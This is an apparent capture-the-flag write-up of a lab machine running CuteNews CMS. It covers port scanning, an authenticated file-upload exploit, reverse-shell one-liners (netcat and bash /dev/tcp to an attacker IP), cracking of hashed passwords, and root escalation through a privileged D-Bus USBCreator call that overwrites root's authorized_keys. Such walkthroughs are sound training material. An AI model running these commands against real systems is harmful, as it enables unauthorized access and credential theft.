What we will do ?
As usual, we have some steps which we follow to pwn any machine, our steps are:
- Recon / Information gathering
- Gaining Access
- Maintaining Access
- Reporting / Analysis
After finishing our steps we will have these informations, stay calm and follow reading :)
1. Information Gathering
In this step we aim to collect all these informations, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc
We will start this step by scanning all ports to discover the open ports and know where we will get into this machine
nmap -sS -sV -T4 -O 10.10.10.206
we have only 2 open ports
80/22 so we will start scan our website on port
I’ve already searched for any public exploit for the version of the Apache, but there’s no interesting exploit.
We have a template website, and we don’t find any interesting information and if you notice in the upper right side there’s no any redirection happened, so we will start checking the source code
We have a
CuteNews directory and after searching about it, I’ve found that it’s a CMS “Content Management System”.
Let’s try to access it
We have a login portal and also the version of the CMS is
Let’s try to search for any public exploit for this version
We have authenticated arbitrary file upload vulnerability, and for
We also have the exploit code
CVE-2019–11447 which asks us to be authenticated.
In this step we aim to scan all collected info from the previous one.
So, create an account and try to execute it
It uploads a PHP file which will execute the
cmd content on the system, let’s try to access the file directory and execute a reverse shell code
As you can see when I entered
whoami it executed it to the server, so let’s try to open a shell from this variable, we have an OS command injection.
3. Gaining Access
nc 10.10.xx.xx 1234 -e /bin/bash or
bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1 and encode it as
And after executed it to the server and listened on the specific port using
I’ve gained a shell :)
Let’s try to escalate our privileges to have another user role or privileges.
4. Maintaining Access
Let’s check the files of
We have multiple PHP files which we can start scan the files which have large size because it may contain juicy informations.
For these 2 files we have
base64 code which we need to decode it by using any online or offline tool
echo "the_encoded_text_here" | base64 -d
After decoding it we have passwords for
nadav but they’re hashed.
At the first we need to know the hash type by using Hash Analyzer
For now, we need to break them using any online decrypt tool, hashcat or john
hashcat -m 1400 paul.hash -w rockyou.txt
The results are
We can also access the user text.
After that we need to get the second user
By searching and enumerating the
paul directory, I’ve found the
.ssh directory which contain
There’s a hint at the machine discussion says that the 2 users shares all things with together
So let’s try to use it and login as
It works and we have only one step to get the root account.
PsPy64 to know the system processes,I’ve noticed that there’s a process
ibus which executed every seconds
After searching for how to use it to open a shell, I’ve found these 2 amazing resources
The second blog is written by someone called Nadav “The machine creator”
hacktricks enumeration steps by checking for the D-Bus interfaces
I’ve found that there’s an interface called
USBCreator which have privileges
After some search about how to use it to open a root shell, I’ve found that you can use it to overwrite a file into the root directory, so I can generate my own
rsa file and copy it the root
/root/.ssh/authorized_keys directory to be authenticated as a root to the system
Let’s generate our
rsa key, and then copy the public one to the root directory.
Use this code to perform the transportation process
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/eslam_rsa.pub /root/.ssh/authorized_keys true
And then try to access the root account using the private ssh key
ssh -i id_rsa email@example.com
If you speak Arabic, you can watch my walkthrough which I’ve explained all these steps from here